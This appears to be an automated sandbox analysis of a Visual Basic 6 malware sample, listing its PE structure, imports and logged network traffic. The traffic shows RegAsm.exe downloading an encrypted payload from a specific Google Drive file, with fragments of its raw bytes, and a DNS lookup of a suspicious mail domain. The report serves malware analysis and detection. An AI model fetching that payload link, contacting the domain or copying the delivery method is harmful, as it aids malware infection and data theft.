IMAGE_DIRECTORY_ENTRY_IMPORT	0x15344	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x1cba	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x230	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x134	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x147f8	0x15000	False	0.504417782738	data	6.30107135382	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x16000	0xd0c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17000	0x1cba	0x2000	False	0.348876953125	data	3.77024898277	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x189bc	0x2fe	MS Windows icon resource - 1 icon, 32x32, 16 colors	English	United States
CUSTOM	0x180fe	0x8be	MS Windows icon resource - 1 icon, 32x32, 8 bits/pixel	English	United States
CUSTOM	0x17e00	0x2fe	MS Windows icon resource - 1 icon, 32x32, 16 colors, 4 bits/pixel	English	United States
RT_ICON	0x17558	0x8a8	data
RT_GROUP_ICON	0x17544	0x14	data
RT_VERSION	0x171a0	0x3a4	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaDateVar, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaLateMemCall, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Collides Systems, Inc.
InternalName	PYRAMIDLIKE
FileVersion	4.00
CompanyName	Collides Systems, Inc.
LegalTrademarks	Collides Systems, Inc.
Comments	Collides Systems, Inc.
ProductName	Collides Systems, Inc.
ProductVersion	4.00
FileDescription	Collides Systems, Inc.
OriginalFilename	PYRAMIDLIKE.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2021 16:35:50.315891027 CEST	49785	443	192.168.11.20	172.217.168.46
Oct 12, 2021 16:35:50.315973997 CEST	443	49785	172.217.168.46	192.168.11.20
Oct 12, 2021 16:35:50.316353083 CEST	49785	443	192.168.11.20	172.217.168.46
Oct 12, 2021 16:35:50.339035988 CEST	49785	443	192.168.11.20	172.217.168.46
Oct 12, 2021 16:35:50.339090109 CEST	443	49785	172.217.168.46	192.168.11.20
Oct 12, 2021 16:35:50.394996881 CEST	443	49785	172.217.168.46	192.168.11.20
Oct 12, 2021 16:35:50.395183086 CEST	49785	443	192.168.11.20	172.217.168.46
Oct 12, 2021 16:35:50.397950888 CEST	443	49785	172.217.168.46	192.168.11.20
Oct 12, 2021 16:35:50.398192883 CEST	49785	443	192.168.11.20	172.217.168.46
Oct 12, 2021 16:35:50.526648045 CEST	49785	443	192.168.11.20	172.217.168.46
Oct 12, 2021 16:35:50.526689053 CEST	443	49785	172.217.168.46	192.168.11.20
Oct 12, 2021 16:35:50.527189016 CEST	443	49785	172.217.168.46	192.168.11.20
Oct 12, 2021 16:35:50.527323008 CEST	49785	443	192.168.11.20	172.217.168.46
Oct 12, 2021 16:35:50.531935930 CEST	49785	443	192.168.11.20	172.217.168.46
Oct 12, 2021 16:35:50.573935986 CEST	443	49785	172.217.168.46	192.168.11.20
Oct 12, 2021 16:35:50.984705925 CEST	443	49785	172.217.168.46	192.168.11.20
Oct 12, 2021 16:35:50.984819889 CEST	443	49785	172.217.168.46	192.168.11.20
Oct 12, 2021 16:35:50.984869957 CEST	49785	443	192.168.11.20	172.217.168.46
Oct 12, 2021 16:35:50.984955072 CEST	49785	443	192.168.11.20	172.217.168.46
Oct 12, 2021 16:35:50.984987974 CEST	443	49785	172.217.168.46	192.168.11.20
Oct 12, 2021 16:35:50.985106945 CEST	443	49785	172.217.168.46	192.168.11.20
Oct 12, 2021 16:35:50.985116959 CEST	49785	443	192.168.11.20	172.217.168.46
Oct 12, 2021 16:35:50.985215902 CEST	49785	443	192.168.11.20	172.217.168.46
Oct 12, 2021 16:35:50.990693092 CEST	49785	443	192.168.11.20	172.217.168.46
Oct 12, 2021 16:35:50.990777016 CEST	443	49785	172.217.168.46	192.168.11.20
Oct 12, 2021 16:35:51.048360109 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.048440933 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.048674107 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.048893929 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.048928976 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.099008083 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.099311113 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.102159023 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.102354050 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.102473021 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.106770992 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.106818914 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.107465029 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.107630968 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.108063936 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.149899006 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.300071955 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.300263882 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.300285101 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.300338030 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.300447941 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.300474882 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.300550938 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.300738096 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.301132917 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.301331043 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.301924944 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.302113056 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.302114964 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.302165985 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.302284002 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.302388906 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.302845955 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.303033113 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.310254097 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.310498953 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.310508013 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.310556889 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.310678959 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.310713053 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.310786009 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.310825109 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.310864925 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.311055899 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.311321974 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.311497927 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.311551094 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.311609030 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.311727047 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.311846018 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.312261105 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.312452078 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.312458992 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.312513113 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.312670946 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.312706947 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.312988997 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.313148022 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.313179970 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.313235998 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.313364029 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.313400030 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.313954115 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.314141989 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.314150095 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.314196110 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.314353943 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.314389944 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.314733028 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.314908981 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.314951897 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.315007925 CEST	443	49786	142.250.185.161	192.168.11.20
Oct 12, 2021 16:35:51.315105915 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.315160990 CEST	49786	443	192.168.11.20	142.250.185.161
Oct 12, 2021 16:35:51.315737009 CEST	443	49786	142.250.185.161	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2021 16:35:50.280833960 CEST	52216	53	192.168.11.20	1.1.1.1
Oct 12, 2021 16:35:50.301955938 CEST	53	52216	1.1.1.1	192.168.11.20
Oct 12, 2021 16:35:51.036583900 CEST	65431	53	192.168.11.20	1.1.1.1
Oct 12, 2021 16:35:51.046997070 CEST	53	65431	1.1.1.1	192.168.11.20
Oct 12, 2021 16:37:27.012191057 CEST	52328	53	192.168.11.20	1.1.1.1
Oct 12, 2021 16:37:27.293019056 CEST	53	52328	1.1.1.1	192.168.11.20
Oct 12, 2021 16:37:28.024907112 CEST	63068	53	192.168.11.20	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 12, 2021 16:35:50.280833960 CEST	192.168.11.20	1.1.1.1	0x356e	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Oct 12, 2021 16:35:51.036583900 CEST	192.168.11.20	1.1.1.1	0x14ce	Standard query (0)	doc-00-88-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Oct 12, 2021 16:37:27.012191057 CEST	192.168.11.20	1.1.1.1	0x9210	Standard query (0)	mail.tccinfaes.com	A (IP address)	IN (0x0001)
Oct 12, 2021 16:37:28.024907112 CEST	192.168.11.20	1.1.1.1	0x6ada	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 12, 2021 16:35:50.301955938 CEST	1.1.1.1	192.168.11.20	0x356e	No error (0)	drive.google.com		172.217.168.46	A (IP address)	IN (0x0001)
Oct 12, 2021 16:35:51.046997070 CEST	1.1.1.1	192.168.11.20	0x14ce	No error (0)	doc-00-88-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Oct 12, 2021 16:35:51.046997070 CEST	1.1.1.1	192.168.11.20	0x14ce	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.161	A (IP address)	IN (0x0001)
Oct 12, 2021 16:37:27.293019056 CEST	1.1.1.1	192.168.11.20	0x9210	No error (0)	mail.tccinfaes.com	tccinfaes.com		CNAME (Canonical name)	IN (0x0001)
Oct 12, 2021 16:37:27.293019056 CEST	1.1.1.1	192.168.11.20	0x9210	No error (0)	tccinfaes.com		188.93.227.195	A (IP address)	IN (0x0001)
Oct 12, 2021 16:37:28.034893036 CEST	1.1.1.1	192.168.11.20	0x6ada	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-00-88-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49785	172.217.168.46	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-12 14:35:50 UTC	0	OUT	GET /uc?export=download&id=1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2021-10-12 14:35:50 UTC	0	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 12 Oct 2021 14:35:50 GMT Location: https://doc-00-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9gljef6kikngnm2hs1ehcuq6imn5jtp3/1634049300000/00014782062933200622/*/1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'nonce-z+YriJyAGtlG7ri72yDjKg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=511=vDyPGg6HyaafQXtSzkh9HZU5AZKX4V7olV_nLdD6g4d0yM0Ot_dJNQUuDAHWbTIoqkTs7PqsxTzqifALuvjEJLJkXsFZee-lArZKo8hZ-KCvQcxDB1-0wBUWw2oyGvvxEP7EeyFkIuDbKj3seUZA07gpHqIaMa0_LSClw63POwk; expires=Wed, 13-Apr-2022 14:35:50 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-10-12 14:35:50 UTC	1	IN	Data Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 30 2d 38 38 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 39 67 6c 6a Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-00-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9glj
2021-10-12 14:35:50 UTC	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49786	142.250.185.161	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-12 14:35:51 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9gljef6kikngnm2hs1ehcuq6imn5jtp3/1634049300000/00014782062933200622/*/1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-00-88-docs.googleusercontent.com Connection: Keep-Alive
2021-10-12 14:35:51 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdvWRcSX7LkHLpcnRaBJFwwcalrM1cXYMT2SEMmlylz55sZit0E3mV09IVGKBOjm01bsidlrDP16xp1gqD5jEi4 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="KEV-LOG_gNNqvwvBuU104.bin";filename*=UTF-8''KEV-LOG_gNNqvwvBuU104.bin Content-Length: 221760 Date: Tue, 12 Oct 2021 14:35:51 GMT Expires: Tue, 12 Oct 2021 14:35:51 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=LlDGKA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-10-12 14:35:51 UTC	5	IN	Data Raw: a0 d8 27 55 d5 d2 29 c2 46 06 2a b6 05 4d f5 2b bc 04 29 ec 09 df d4 d0 5f 47 c3 c7 77 c3 04 38 3c 4b ea 35 13 84 29 e7 49 24 86 5d b4 4c 2d b7 31 c9 54 4e eb 99 c1 4a 64 b0 6c 3b ea fc 9e 6c ce 97 0f a1 8c 3c 45 01 f2 6a b1 4a 4f c1 8b 46 a3 c3 8f bf 00 1a 3a 27 bf d1 6c 3b 35 7d d5 0d 1c 00 b8 07 cd 09 1d 16 bb 38 39 4a 5f d7 a0 3d 8c b0 24 99 60 0d b0 48 fe f6 d1 24 08 95 69 6b e6 6f 8d 49 1b eb de 24 cc 6a 39 9a 21 77 9d 6e 8a 5a fc 20 c4 ef c7 67 0e a0 d8 c6 d5 fa 9d 43 ba d5 1c 51 13 d2 75 eb 92 c2 b4 39 ad 71 49 14 42 53 5d 1d 25 de e7 cd fd 28 89 69 29 7b dd a3 99 f5 4a 1b 41 87 ab 25 4f 91 2c cd 06 82 0c 80 90 16 a3 36 88 0b 1f 95 3b 94 65 00 97 ff 87 29 8a ad f8 00 de 9b f4 f3 cb c1 9e d1 c1 52 00 44 39 93 c8 4c b8 79 8a 0b 77 0c f9 9b 6a 76 ad Data Ascii: 'U)F*M+)_Gw8<K5)I$]L-1TNJdl;l<EjJOF:'l;5}89J_=$`H$ikoI$j9!wnZ gCQu9qIBS]%(i){JA%O,6;e)RD9Lywjv
2021-10-12 14:35:51 UTC	9	IN	Data Raw: f4 3c 74 ad 35 e5 f8 a2 f0 09 62 50 c3 54 95 89 cb 8a 81 ff ad 05 10 aa 53 3a 14 9f 3d ab cc c3 a7 c9 fc 16 a3 58 ba c9 b3 76 ef 8d 98 6e 14 41 93 ee e9 c2 b8 bc 62 85 c4 e0 d0 f2 54 32 4b 60 ad 29 01 6e 30 e1 d5 50 6f 4c 95 82 79 26 a5 50 21 5f 78 2f 26 db d1 d4 4b b0 1c eb 32 b4 17 2d ab 2e 8f dd 2f 3b 6e ab 6b 89 ed 7f 2f db 98 ea 2b 15 ab 75 aa 47 7f 83 07 48 62 73 98 2d 3e e8 14 91 ab c6 4c 28 66 bf f4 a3 16 04 83 e1 73 9d 37 88 f0 62 0a 52 30 f8 52 e7 b3 ee 56 f7 6a e1 b2 2f fa 1d 44 f1 66 c5 20 9d f9 5d 4d 57 5f e0 b7 3c d8 79 c8 64 65 d7 f4 0b 33 79 a6 56 98 72 86 a8 1f 7d 97 63 63 57 74 b1 db a0 65 ee 2c 71 10 3f e9 51 d8 6a 0a 61 57 8e 05 7e ff 75 39 86 36 6c d7 78 ef ce 18 39 2f 0a 4e 08 66 2c 92 aa 42 06 2b 0b 63 98 97 db e3 0b 30 0c 03 69 74 Data Ascii: <t5bPTS:=XvnAbT2K`)n0PoLy&P!_x/&K2-./;nk/+uGHbs->L(fs7bR0RVj/Df ]MW_<yde3yVr}ccWte,q?QjaW~u96lx9/Nf,B+c0it
2021-10-12 14:35:51 UTC	13	IN	Data Raw: 01 11 75 73 f6 29 dd 18 90 d3 48 59 0a 6c 29 85 e2 89 7f 53 87 aa 4e fe f7 da 71 17 c1 f7 f1 41 2c 77 50 39 b3 f5 61 be 11 32 00 12 3f d8 8e 8a 31 08 d9 7e f0 02 ac d2 5e ec 55 82 80 bb 23 76 e1 f2 a4 fb 79 6c 34 95 87 83 cc a4 cc 9c df 04 69 29 c4 9f 68 ce b1 96 fb 21 df e4 0b 38 3b cb 09 e5 3c b8 78 cd 0f dd 01 03 9b ba 08 4b 54 9e 0c d4 eb c2 c5 be da 3a 01 08 75 35 a2 5c 3b 36 1e 2c de 75 d0 95 60 e9 3f 8a 20 c6 cf b6 3e 3a 5a 4d 8a 24 0b f3 dd 91 f3 66 43 09 ae f7 a4 e8 09 07 da 2b 7c 3b 48 70 cd 1f f7 8a ed 21 45 ae c5 57 46 0c 36 29 c9 53 e6 11 11 2e 2c a2 2d 43 6f ad da 09 b1 2a 5a 24 63 2d 79 e9 2e 95 a1 1e 98 e3 09 fd 64 65 4f 47 55 18 a8 83 bc d9 81 ae 59 a0 3e 74 6a fd c3 87 5b 97 de a6 5c 50 30 b4 34 5d b2 7f 44 92 cd 27 73 e1 3f fa 1a 4d ae Data Ascii: us)HYl)SNqA,wP9a2?1~^U#vyl4i)h!8;<xKT:u5\;6,u`? >:ZM$fC+\|;Hp!EWF6)S.,-Co*Z$c-y.deOGUY>tj[\P04]D's?M
